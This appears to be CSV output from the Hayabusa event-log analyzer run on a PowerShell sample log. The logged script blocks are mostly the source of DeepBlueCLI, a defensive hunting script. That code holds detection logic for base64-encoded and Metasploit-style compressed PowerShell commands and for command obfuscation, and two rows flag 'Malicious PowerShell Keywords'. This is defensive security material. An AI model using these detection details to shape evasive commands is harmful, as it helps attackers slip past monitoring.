Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.562 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.567 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.570 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.476 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.476 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:50.477 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:51.309 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:14.153 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:19.463 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:22.680 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:42:36.639 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.016 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex 